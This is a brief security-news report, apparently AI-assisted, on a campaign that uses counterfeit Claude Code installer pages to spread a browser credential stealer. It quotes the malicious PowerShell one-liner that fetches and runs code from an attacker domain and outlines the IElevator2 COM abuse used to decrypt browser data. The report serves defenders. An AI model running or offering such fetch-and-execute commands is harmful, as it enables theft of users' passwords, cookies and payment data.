An ongoing malware campaign is stealing sensitive information from developers by using counterfeit Claude Code installers and other popular coding tools, according to research from Ontinue.
Details of the Attack
The attackers mimic a legitimate one-line installer command, replacing the original destination with a malicious one. The command in question is “irm https[:]//claude[.]ai/install.ps1 | iex”, which is altered to “irm events[.]msft23[.]com | iex”. This tactic allows the malware to exfiltrate decrypted cookies, passwords, and payment information from Chromium-based browsers, including Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera.
Exploitation of IElevator2 COM Interface
The malware also exploits the IElevator2 COM interface, a service introduced by Google in January to enhance the security of sensitive user data. Despite its protective measures, attackers have found ways to bypass this security, utilizing the new interface to extract sensitive information.
Malware Characteristics
The malware does not align with any known malware families, according to the researchers. It operates across three domains, all registered within a week in April and served through Cloudflare. The malicious command is not embedded in the installer file but is instead rendered in the HTML of the landing page, making it difficult for automated scanners to detect.
Data Exfiltration Process
Once the malware is executed, it uses an obfuscated PowerShell loader to inject a native ABE helper into the browser process. This helper’s primary function is to invoke the IElevator2 COM interface to retrieve the App-Bound Encryption key. Following this, the malware decrypts local browser databases and transmits the stolen data to an attacker-controlled server.
Research indicates that this malware bears some resemblance to Glove Stealer, which also utilizes the IElevator interface, but the orchestration model differs significantly. This distinction is crucial for defenders, as detection methods need to focus on the COM call and PowerShell activity rather than just the native executable.
This article was produced by NeonPulse.today using human and AI-assisted editorial processes, based on publicly available information. Content may be edited for clarity and style.
